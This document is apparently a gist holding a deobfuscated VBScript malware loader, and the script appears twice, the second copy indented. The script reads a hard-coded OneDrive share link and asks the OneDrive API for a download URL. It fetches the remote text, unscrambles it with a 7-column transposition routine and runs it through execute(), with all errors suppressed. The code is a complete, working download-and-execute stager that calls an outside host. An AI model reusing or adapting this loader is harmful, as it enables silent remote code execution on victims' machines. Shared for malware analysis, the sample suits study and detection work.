JohnHammond/deobfuscated_CF8C.vbs Secret

## deobfuscated_CF8C.vbs
On Error Resume Next
Request_0 = "https://onedrive.live.com/?authkey=%21AL1nlnPI22OktF8&cid=FF254DB40FA2A3BA&id=FF254DB40FA2A3BA%21113&parId=root&o=OneUp"
Set Post0 = CreateObject("msxml2.xmlhttp")
Set fs = CreateObject("Scripting.FileSystemObject")

Function FileWrite(filename, content)
Set hnd = fs.CreateTextFile(filename, True)
	hnd.Write content
	hnd.Close
End Function

Function Co00(c)
        d=7
        L=Len(c)
        s=""
        For jx=0 To d-1

                For ix=0 To Int(L/d)-1

                s=s&Mid(c,ix*d+jx+1,1)

                Next

        Next

        s=s&Right(c,L-Int(L/d)*d)

        Co00=s
End Function

Function my_preg_match(vbs_data, pattern, patternorder, submatchorder)
	Set re = New RegExp
	re.Pattern = pattern
	re.Global = True
	If re.Test(vbs_data) = 0 Then
		act_flag = 0
		Exit Function
	End if
	Set oMatches = re.Execute(vbs_data)
	Set oMatch = oMatches(patternorder)
	my_preg_match = oMatch
End Function


pattn = "authkey=[a-zA-Z0-9%_-]+"
authkey = my_preg_match(Request_0, pattn, 0, 0)
authkey = Replace(authkey, "%21", "!")
authkey = Replace(authkey, "%5F", "_")
authkey = Replace(authkey, "%2D", "-")


pattn = "cid=[a-zA-Z0-9%_-]+"
cid = my_preg_match(Request_0, pattn, 0, 0)

pattn = "&(id=[a-zA-Z0-9%_-]+)"
id = my_preg_match(Request_0, pattn, 0, 0)
id = Replace(id, "&", "")
id = Replace(id, "%21", "!")


path1 = Replace(cid, "cid=", "")
path2 = Replace(id, "id=", "")
Request_1 = "https://api.onedrive.com/v1.0/drives/" + path1 + "/items/" + path2 + "?select=id%2C%40content.downloadUrl&" + authkey


Post0.open "GET", Request_1, False
Post0.setRequestHeader "Content-Type", "application/json", "odata.metadata=none"
Post0.Send
Response_1 = Post0.responseText

pattn = "downloadUrl.*https*\\:\\/\\/.*.1drv\\.com\\/[a-zA-Z0-9_-]+"
Request_2 = my_preg_match(Response_1, pattn, 0, 0)
Request_2 = Mid(Request_2, 15, Len(Request_2) - 15 + 1)

Post0.open "GET", Request_2, False
Post0.setRequestHeader "Content-Type", "text/plain"
Post0.Send
Response_2 = Post0.responseText

PlainCmdline =  Co00(Response_2)
execute(PlainCmdline)
	On Error Resume Next
	Request_0 = "https://onedrive.live.com/?authkey=%21AL1nlnPI22OktF8&cid=FF254DB40FA2A3BA&id=FF254DB40FA2A3BA%21113&parId=root&o=OneUp"
	Set Post0 = CreateObject("msxml2.xmlhttp")
	Set fs = CreateObject("Scripting.FileSystemObject")

	Function FileWrite(filename, content)
	Set hnd = fs.CreateTextFile(filename, True)
	hnd.Write content
	hnd.Close
	End Function

	Function Co00(c)
	d=7
	L=Len(c)
	s=""
	For jx=0 To d-1

	For ix=0 To Int(L/d)-1

	s=s&Mid(c,ix*d+jx+1,1)

	Next

	Next

	s=s&Right(c,L-Int(L/d)*d)

	Co00=s
	End Function

	Function my_preg_match(vbs_data, pattern, patternorder, submatchorder)
	Set re = New RegExp
	re.Pattern = pattern
	re.Global = True
	If re.Test(vbs_data) = 0 Then
	act_flag = 0
	Exit Function
	End if
	Set oMatches = re.Execute(vbs_data)
	Set oMatch = oMatches(patternorder)
	my_preg_match = oMatch
	End Function


	pattn = "authkey=[a-zA-Z0-9%_-]+"
	authkey = my_preg_match(Request_0, pattn, 0, 0)
	authkey = Replace(authkey, "%21", "!")
	authkey = Replace(authkey, "%5F", "_")
	authkey = Replace(authkey, "%2D", "-")


	pattn = "cid=[a-zA-Z0-9%_-]+"
	cid = my_preg_match(Request_0, pattn, 0, 0)

	pattn = "&(id=[a-zA-Z0-9%_-]+)"
	id = my_preg_match(Request_0, pattn, 0, 0)
	id = Replace(id, "&", "")
	id = Replace(id, "%21", "!")


	path1 = Replace(cid, "cid=", "")
	path2 = Replace(id, "id=", "")
	Request_1 = "https://api.onedrive.com/v1.0/drives/" + path1 + "/items/" + path2 + "?select=id%2C%40content.downloadUrl&" + authkey


	Post0.open "GET", Request_1, False
	Post0.setRequestHeader "Content-Type", "application/json", "odata.metadata=none"
	Post0.Send
	Response_1 = Post0.responseText

	pattn = "downloadUrl.https\\:\\/\\/.*.1drv\\.com\\/[a-zA-Z0-9_-]+"
	Request_2 = my_preg_match(Response_1, pattn, 0, 0)
	Request_2 = Mid(Request_2, 15, Len(Request_2) - 15 + 1)

	Post0.open "GET", Request_2, False
	Post0.setRequestHeader "Content-Type", "text/plain"
	Post0.Send
	Response_2 = Post0.responseText

	PlainCmdline = Co00(Response_2)
	execute(PlainCmdline)